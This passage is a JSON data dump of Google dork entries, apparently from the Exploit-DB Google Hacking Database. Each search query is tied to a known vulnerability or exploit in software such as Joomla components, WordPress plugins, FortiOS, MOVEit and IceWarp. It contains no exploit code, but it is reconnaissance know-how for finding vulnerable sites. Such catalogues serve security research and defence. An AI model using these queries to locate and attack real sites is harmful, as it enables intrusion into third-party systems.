exploits:\r\nhttps://www.exploit-db.com/exploits/30450\r\nhttps://www.exploit-db.com/exploits/30449\r\nhttps://www.exploit-db.com/exploits/30448\r\nhttps://www.exploit-db.com/exploits/5618\r\nhttps://www.exploit-db.com/exploits/4258\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "filetype:php inurl:\"/general/login.php?PHPSESSID=\"", "description": "# Google Dork: filetype:php inurl:\"/general/login.php?PHPSESSID=\"\r\n\r\n# By using this dork, sites running PHPCollab 2.5, which are prone to SQL\r\nInjection and other multiple vulnerabilities, can be found. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/37004\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:php-bin/webclient.php", "description": "# Google Dork: inurl:php-bin/webclient.php\r\n\r\n# By using this dork, sites vulnerable to 0day Alcatel-Lucent Omnivista\r\n8770 - Remote Code Execution, can be found. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/47761\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/?op=registration", "description": "# Google Dork: inurl:/?op=registration\r\n\r\n# By using this dork, sites vulnerable to Xfilesharing 2.5.1 - Arbitrary\r\nFile Upload, can be found. This dork is linked to the following existing\r\nexploit: https://www.exploit-db.com/exploits/47659\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Powered by YouPHPTube\"", "description": "# Google Dork: intext:\"Powered by YouPHPTube\"\r\n\r\n# By using this dork, sites vulnerable to YouPHPTube"}, {"dork": "inurl:\"wp-contentpluginsall-in-one-seo-pack\"", "description": "# Google Dork: inurl:\"\\wp-content\\plugins\\all-in-one-seo-pack\"\r\n\r\n# By using this dork, sites vulnerable to all-in-one-seo-pack 3.2.7 -\r\nPersistent Cross-Site Scripting, can be found. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/47425\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"My Book World Edition - MyBookWorld\"", "description": "# Google Dork: intitle:\"My Book World Edition - MyBookWorld\"\r\n\r\n# By using this dork, sites vulnerable to Western Digital My Book World II\r\nNAS"}, {"dork": "inurl:\"index.php?option=com_jsjobs\"", "description": "# Google Dork: inurl:\"index.php?option=com_jsjobs\"\r\n\r\n# By using this dork, sites vulnerable to Joomla! component com_jsjobs -\r\n'customfields.php' SQL Injection, can be found. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/47249\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net", "description": "# Google Dork: intitle:qdPM 9.1. Copyright \u00a9 2020 qdpm.net\r\n\r\n# Sites vulnerable to qdPM < 9.1 - Remote Code Execution. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48146\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:zdm logon", "description": "# Google Dork: inurl:zdm logon\r\n\r\n# Sites vulnerable to Citrix XenMobile Server 10.8 - XML External Entity\r\nInjection. This dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47951\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:www/delivery filetype:php", "description": "# Google Dork: inurl:www/delivery filetype:php\r\n\r\n# Sites vulnerable to Revive Adserver 4.2 - Remote Code Execution. This\r\ndork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47739\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Please Login\" inurl:\"/remote/login\"", "description": "# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\r\n\r\n# FortiOS Leak file - Reading login/passwords in clear text. This dork is\r\nlinked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/47287\r\nhttps://www.exploit-db.com/exploits/47288\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"/course/jumpto.php?jump=\"", "description": "# Google Dork: inurl:\"/course/jumpto.php?jump=\"\r\n\r\n# Moodle 3.4.1 - Remote Code Execution. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/46551\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"elFinder 2.1.x\"", "description": "# Google Dork: intitle:\"elFinder 2.1.x\"\r\n\r\n# elFinder"}, {"dork": "inurl:/wp-content/themes/CherryFramework", "description": "# Google Dork: inurl:/wp-content/themes/CherryFramework\r\n\r\n# Wordpress CherryFramework Themes 3.1.4 - Backup File Download. This dork\r\nis linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/45896\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/webmail/ intext:Powered by IceWarp Server", "description": "# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server\r\n\r\n# IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47988\r\n\r\n# Date: 2/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "index of /wp-content/themes/avada", "description": "Dork: index of /wp-content/themes/avada\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the Avada theme. Ref: https://wpvulndb.com/vulnerabilities/10209\r\nAuthor: Abhi Chitkara"}, {"dork": "index of /wp-content/themes/onetone/", "description": "Dork: index of /wp-content/themes/onetone/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the onetone theme. Ref: https://wpvulndb.com/vulnerabilities/10165\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/themes/listingpro/", "description": "Dork: inurl:/wp-content/themes/listingpro/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the listingpro theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10025\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/themes/traveler/", "description": "Dork: inurl:/wp-content/themes/traveler/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the traveler theme. Ref: https://wpvulndb.com/vulnerabilities/10023\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/themes/fruitful/", "description": "Dork: inurl:/wp-content/themes/fruitful/\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the fruitful theme. Ref: https://wpvulndb.com/vulnerabilities/10128\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/learnpress\"", "description": "Dork: inurl:\"wp-content/plugins/learnpress\"\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the LearnPress Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10208\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/ninja-forms\"", "description": "Dork: inurl:\"wp-content/plugins/ninja-forms\"\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the ninja forms Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10200\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/elementor-pro", "description": "Dork: inurl:wp-content/plugins/elementor-pro\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the Elementor Pro Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10214\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ultimate-elementor", "description": "Dork: inurl:wp-content/plugins/ultimate-elementor\r\nDescription: This Google dork lists out Advisories and Vulnerabilities\r\nabout the Ultimate Elementor Plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10215\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/page-builder", "description": "Dork: inurl:wp-content/plugins/page-builder\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the page builder by site origin wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10219\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/chopslider", "description": "Dork: inurl:wp-content/plugins/chopslider\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the chopslider wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10216\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"index.php?option=com_hdwplayer\"", "description": "# Google Dork: inurl:\"index.php?option=com_hdwplayer\"\r\n\r\n# Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48242\r\n\r\n# Date: 14/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:index.php?option=com_newsfeeds", "description": "# Google Dork: inurl:index.php?option=com_newsfeeds\r\n\r\n# Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection. This dork\r\nis linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48202\r\n\r\n# Date: 14/05/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/easy-testimonials", "description": "Dork: inurl:wp-content/plugins/easy-testimonials\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the easy testimonials wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10223\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/google-site-kit", "description": "Dork: inurl:wp-content/plugins/google-site-kit\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the google site kit wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10224\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/photo-gallery", "description": "Dork: inurl:wp-content/plugins/photo-gallery\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the photo gallery wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10227\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/easy-login-woocommerce", "description": "Dork: inurl:wp-content/plugins/easy-login-woocommerce\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the easy login woocommerce wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10225\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wp-product-review", "description": "Dork: inurl:wp-content/plugins/wp-product-review\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp product review wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10226\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/team-members", "description": "Dork: inurl:wp-content/plugins/team-members\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the team members wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10228\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"index.php?option=com_fabrik\"", "description": "# Google Dork: inurl:\"index.php?option=com_fabrik\"\r\n\r\n# Joomla! com_fabrik 3.9.11 - Directory Traversal. This dork is linked to\r\nthe following existing exploit: https://www.exploit-db.com/exploits/48263\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:human.aspx intext:moveit", "description": "# Google Dork: inurl:human.aspx intext:moveit\r\n\r\n# MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection. This dork\r\nis linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48316\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"sites/all/modules/ckeditor\" -drupalcode.org", "description": "# Google Dork: inurl:\"sites/all/modules/ckeditor\" -drupalcode.org\r\n\r\n# Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site\r\nScripting. This dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/18389\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Created by John Caruso\" intext:\"Created with Simple PHP Photo Gallery\"", "description": "# Google Dork: intext:\"Created by John Caruso\"\r\nintext:\"Created with Simple PHP Photo Gallery\"\r\n\r\n# SimplePHPGal 0.7 - Remote File Inclusion. This dork is linked to the\r\nfollowing existing exploit: https://www.exploit-db.com/exploits/48424\r\n\r\n# Date: 19/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"LMS v3.0 - Xerone IT\"", "description": "# Google Dork: \"LMS v3.0 - Xerone IT\"\r\n\r\n# Xeroneit Library Management System 3.0 - 'category' SQL Injection. This\r\ndork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48328\r\n\r\n# Date: 20/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"index.php?option=com_jssupportticket\"", "description": "# Google Dork: inurl:\"index.php?option=com_jssupportticket\"\r\n\r\n# Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5\r\n- Arbitrary File Download. This dork is linked to the following existing\r\nexploit: https://www.exploit-db.com/exploits/47216\r\n\r\n# Date: 20/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/visualcomposer", "description": "Dork: inurl:wp-content/plugins/visualcomposer\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the visual composer wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10229\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ajax-load-more", "description": "Dork: inurl:wp-content/plugins/ajax-load-more\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ajax load more wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10230\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/paid-memberships-pro", "description": "Dork: inurl:wp-content/plugins/paid-memberships-pro\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the paid memberships pro wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10231\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/thirstyaffiliates", "description": "Dork: inurl:wp-content/plugins/thirstyaffiliates\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the thirsty affiliates wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10234\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/official-mailerlite-sign-up-forms", "description": "Dork: inurl:wp-content/plugins/official-mailerlite-sign-up-forms\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the Official MailerLite Sign Up Forms wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10235\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/form-maker\"", "description": "Dork: inurl:\"wp-content/plugins/form-maker\"\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the form maker wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10237\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"index.php?option=com_ccnewsletter\" inurl:sbid", "description": "# Google Dork: inurl:\"index.php?option=com_ccnewsletter\" inurl:sbid\r\n\r\n# Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/42387\r\n\r\n# Date: 26/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" intitle:\"UserPro\" -uploads", "description": "# Google Dork: intitle:\"Index of\" intitle:\"UserPro\" -uploads\r\n\r\n# WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47304\r\n\r\n# Date: 26/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7", "description": "Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the drag and drop multiple file upload wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10238\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-content/plugins/siteorigin-panels\"", "description": "Dork: inurl:\"wp-content/plugins/siteorigin-panels\"\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the siteorigin panels wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10219\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/iframe", "description": "Dork: inurl:wp-content/plugins/iframe\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the iframe wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10221\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/woo-order-export-lite", "description": "Dork: inurl:wp-content/plugins/iframe\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the woo order export lite wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10212\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/grand-media", "description": "Dork: inurl:wp-content/plugins/grand-media\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the grand media wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10197\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/bbPress", "description": "Dork: inurl:wp-content/plugins/bbPress\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the bbPress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10244\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/gtranslate", "description": "Dork: inurl:wp-content/plugins/gtranslate\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the gtranslate wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10181\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/adrotate", "description": "Dork: inurl:wp-content/plugins/adrotate\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ad rotate wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10249\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/mappress-google-maps-for-wordpress", "description": "Dork: inurl:wp-content/plugins/mappress-google-maps-for-wordpress\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the mappress-google-maps-for-wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10246\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/yop-poll", "description": "Dork: inurl:wp-content/plugins/yop-poll\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the Yop Poll wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10189\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ajax-load-more/lang/", "description": "Dork:\r\ninurl:wp-content/plugins/ajax-load-more/lang/\r\n\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ajax load more WordPress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10230\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/woocommerce", "description": "Dork: inurl:wp-content/plugins/woocommerce\r\n\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the woo-commerce WordPress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10220\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/simple-file-list", "description": "Dork: inurl:wp-content/plugins/simple-file-list\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the simple-file-list wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10192\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/final-tiles-grid-gallery-lite", "description": "Dork: inurl:wp-content/plugins/final-tiles-grid-gallery-lite\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the final tiles grid gallery lite wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10241\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/wp-content/plugins/wp-ecommerce-shop-styling/", "description": "Dork: inurl:/wp-content/plugins/wp-ecommerce-shop-styling/\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the WP e-Commerce Shop Styling wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/8079\r\nAuthor: Akash Solanki (MAALP)"}, {"dork": "inurl:wp-content/plugins/wp-jobsearch", "description": "Dork: inurl:wp-content/plugins/wp-jobsearch\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-jobsearch wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10255\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/final-tiles-grid-gallery-lite", "description": "Dork: inurl:wp-content/plugins/final-tiles-grid-gallery-lite\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the final-tiles-grid-gallery-lite wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10241\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/sportspress", "description": "Dork: inurl:wp-content/plugins/elementor\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the elementor wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10257\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-contentpluginsphoto-gallery\"", "description": "# Google Dork: inurl:\"\\wp-content\\plugins\\photo-gallery\"\r\n\r\n# WordPress Plugin Photo Gallery 1.5.34 - SQL Injection. This dork is\r\nlinked to the following existing exploit (CVE : 2019-16119) :\r\nhttps://www.exploit-db.com/exploits/47371\r\n\r\n# Date: 2020-06-09\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "index of /wp-content/uploads/backupbuddy", "description": "Dork: index of /wp-content/uploads/backupbuddy\r\nDescription: This google dork lists out the WordPress backupbuddy.zip file\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/brizy", "description": "Dork: inurl:wp-content/plugins/brizy\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the brizy wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10261\r\nAuthor: Abhi Chitkara"}, {"dork": "\"powered by Typo3\"", "description": "Dork: \"powered by Typo3\"\r\n\r\nDescription: This google dork lists out the \"powered by Typo3\" sites\r\nReference: https://www.cvedetails.com/cve/CVE-2019-12748/\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "\"index of\" \"plugins/wp-rocket\"", "description": "Google Dork: \"index of\" \"plugins/wp-rocket\"\r\nCategory: Advisories and Vulnerabilities\r\nAuthor: Prashant Sharma\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intext:powered by JoomSport - sport WordPress plugin", "description": "# Google Dork: intext:powered by JoomSport - sport WordPress plugin\r\n# JoomSport 3.3 \u2013 for Sports - SQL injection. This dork is linked to the\r\n# following existing exploit (CVE : 2019-14348) :\r\n# https://www.exploit-db.com/exploits/47210\r\n# Date: 2020-06-10\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/themes/newspaper", "description": "Dork: inurl:wp-content/themes/newspaper\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the newspaper wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10253\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/elementor", "description": "Dork: inurl:wp-content/plugins/elementor\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the elementor wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10256\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/kingcomposer", "description": "Dork: inurl:wp-content/plugins/kingcomposer\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the king composer wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10270\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"TopManage (R) 2002 - 2020\"", "description": "# Google Dork: intext:\"TopManage \u00ae 2002 - 2020\"\r\n# OLK Web Store 2020 - Cross-Site Request Forgery. This dork is linked to\r\n# the following existing exploit: https://www.exploit-db.com/exploits/47960\r\n# Date: 05/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:Basato su IceWarp Server", "description": "# Dork: intext:Basato su IceWarp Server\r\n# IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site\r\nScripting.\r\n# This dork is linked to the following existing exploit:\r\n# https://www.exploit-db.com/exploits/47988\r\n\r\n[*] CVE: CVE-2020-8512\r\n[*] Date: 17/06/2020\r\n[*] Author: Sagar Yadav"}, {"dork": "inurl:wp-content/plugins/testimonial-rotator", "description": "Dork: inurl:wp-content/plugins/testimonial-rotator\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the testimonial rotator wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10272\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net", "description": "# Google Dork: intitle:qdPM 9.1. Copyright \u00a9 2020 qdpm.net\r\n# qdPM 9.1 - Remote Code Execution. This dork is linked to the following\r\n# existing exploit (CVE : CVE-2020-7246):\r\n# https://www.exploit-db.com/exploits/47954\r\n# Date: 18/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:Basato su Comunicazioni Integrate IceWarp", "description": "[*] Google Dork:- intext:Basato su Comunicazioni Integrate IceWarp\r\n[*] IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site\r\nScripting.\r\n[*]This dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47988\r\n[*] CVE: CVE-2020-8512\r\n[*] Date: 17/06/2020\r\n[*] Author: Sagar Yadav"}, {"dork": "inurl:/webmail intext:Tecnologia fornecida por IceWarp Server", "description": "# Google Dork: inurl:/webmail intext:Tecnologia fornecida por IceWarp Server\r\n# IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site Scripting.\r\n# This dork is linked to the following existing exploit:\r\n# https://www.exploit-db.com/exploits/47988\r\n\r\n[*] CVE: CVE-2020-8512\r\n[*] Date: 23/06/2020\r\n[*] Author: Vanshal Gaur\r\n[*] Twitter: VanshalG"}, {"dork": "inurl:wp-content/plugins/wp-pro-quiz", "description": "Dork: inurl:wp-content/plugins/wp-pro-quiz\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-pro quiz wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10278\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter", "description": "Dork: inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the YITH-WooCommerce-Ajax-Product-Filter wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10281\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ar-contactus", "description": "Dork: inurl:wp-content/plugins/ar-contactus\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ar contactus wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10277\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wpDiscuz", "description": "# Google Dork: inurl:wp-content/plugins/wpDiscuz\r\n# This google dork lists out Advisories and Vulnerabilities regarding\r\n# the wpDiscuz plugin. Ref: https://wpvulndb.com/vulnerabilities/10273\r\n\r\n[*] wpDiscuz < 5.3.6 - Unauthenticated SQL Injection\r\n[*] Author: Pankaj Verma (_p4nk4j)\r\n[*] LinkedIn: https://www.linkedin.com/in/p4nk4jv/"}, {"dork": "intext:\"Centreon 2005-2019\"", "description": "# Dork :intext:\"Centreon 2005-2019\"\r\n# Vulnerable Service\r\n# CVE-2019-13024\r\n# Author : Ambadi MP"}, {"dork": "inurl:wp-content/themes/citybook", "description": "Dork: inurl:wp-content/themes/citybook\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the citybook wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10275\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/themes/traveler", "description": "Dork: inurl:wp-content/themes/traveler\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the traveler wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10276\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:Powered by 2Moons 2009-2013", "description": "# Google Dork: intext:Powered by 2Moons 2009-2013\r\n# 2Moons - Multiple Vulnerabilities\r\n# This dork is linked to the following existing exploit:\r\n# https://www.exploit-db.com/exploits/37713\r\n\r\n\r\n[*] Date: 26/06/2020\r\n[*] Twitter Handle: VanshalG\r\n[*] Author: Vanshal Gaur"}, {"dork": 